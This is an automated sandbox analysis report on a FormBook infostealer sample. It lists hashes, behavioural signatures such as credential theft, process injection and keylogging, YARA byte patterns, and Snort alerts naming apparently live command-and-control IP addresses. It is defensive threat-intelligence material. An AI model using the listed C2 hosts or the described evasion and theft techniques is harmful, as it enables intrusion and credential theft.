Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI No 20000814C.exe

Overview

General Information

Sample name:PI No 20000814C.exe
Analysis ID:1446508
MD5:fddc263879fbf539b746d116e8429a7f
SHA1:d83296177c8f166a95cafbd12ac1ae327ded42c7
SHA256:6803a04a376df6f873fe53b3b79bf12534b8c1b74d037a01f537e74bac994f88
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PI No 20000814C.exe (PID: 1096 cmdline: "C:\Users\user\Desktop\PI No 20000814C.exe" MD5: FDDC263879FBF539B746D116E8429A7F)
    • svchost.exe (PID: 3204 cmdline: "C:\Users\user\Desktop\PI No 20000814C.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YoOsbbockoYKKBpRowW.exe (PID: 1132 cmdline: "C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cipher.exe (PID: 3432 cmdline: "C:\Windows\SysWOW64\cipher.exe" MD5: EC2B2944AB4480E520A8015A0740E684)
          • YoOsbbockoYKKBpRowW.exe (PID: 3152 cmdline: "C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6408 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x76a65:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x600b4:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2da13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17062:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.470000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.470000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cc13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.470000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.470000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2da13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17062:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ParentImage: C:\Users\user\Desktop\PI No 20000814C.exe, ParentProcessId: 1096, ParentProcessName: PI No 20000814C.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ProcessId: 3204, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ParentImage: C:\Users\user\Desktop\PI No 20000814C.exe, ParentProcessId: 1096, ParentProcessName: PI No 20000814C.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ProcessId: 3204, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:05/23/24-15:22:06.071714
            SID:2855465
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:18:49.680830
            SID:2855465
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:58.470715
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:45.419534
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:49.011176
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:05.833612
            SID:2855464
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:14.696083
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:13.744543
            SID:2855465
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:19.632073
            SID:2855464
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:26.119155
            SID:2855464
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:27.226609
            SID:2855465
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:20.382287
            SID:2855465
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:34.789548
            SID:2855465
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:48.963738
            SID:2855464
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:29.725643
            SID:2855464
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:32.767630
            SID:2855464
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:02.477355
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:40.382894
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:43.353051
            SID:2855465
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:08.371111
            SID:2855464
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:47.492356
            SID:2855464
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:01.008997
            SID:2855464
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:15.750020
            SID:2855464
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:30.227166
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:43.953802
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:22.165946
            SID:2855464
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:23.881931
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:50.479813
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:17.233600
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:14.369346
            SID:2855464
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:09.103352
            SID:2855465
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:46.313193
            SID:2855464
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:08.950461
            SID:2855465
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:37.057490
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:01.493554
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:18.289377
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:35.307782
            SID:2855464
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:54.075610
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:29.405295
            SID:2855464
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:04.025678
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:42.874552
            SID:2855464
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:20:31.945274
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:32.772777
            SID:2855464
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:11.829591
            SID:2855464
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:19:59.949567
            SID:2855464
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:23.355712
            SID:2855465
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:37.915666
            SID:2855465
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:22:51.493681
            SID:2855464
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:21:52.561396
            SID:2855465
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: PI No 20000814C.exeVirustotal: Detection: 41%Perma Link
            Source: PI No 20000814C.exeReversingLabs: Detection: 39%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PI No 20000814C.exeJoe Sandbox ML: detected
            Source: PI No 20000814C.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4522417554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4520103554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: cipher.pdbGCTL source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: cipher.pdb source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F64696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F64696
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F6C9C7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6C93C FindFirstFileW,FindClose,0_2_00F6C93C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F6F200
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F6F35D
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F6F65E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F63A2B
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F63D4E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F6BF27
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032CBBC0 FindFirstFileW,FindNextFileW,FindClose,4_2_032CBBC0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4x nop then xor eax, eax4_2_032B9750

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49705 -> 69.57.162.24:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49706 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49707 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49711 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49712 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49714 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49715 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49716 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49719 -> 104.21.28.203:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49720 -> 104.21.28.203:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49722 -> 104.21.28.203:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49723 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49724 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49726 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49731 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49732 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49735 -> 185.253.212.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 185.253.212.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 185.253.212.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49739 -> 87.236.16.214:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49740 -> 87.236.16.214:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49742 -> 87.236.16.214:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49743 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49744 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49746 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49747 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49748 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49750 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49751 -> 5.101.153.149:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49752 -> 5.101.153.149:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49754 -> 5.101.153.149:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49755 -> 92.118.24.161:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49756 -> 92.118.24.161:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49758 -> 92.118.24.161:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49759 -> 212.227.172.253:80
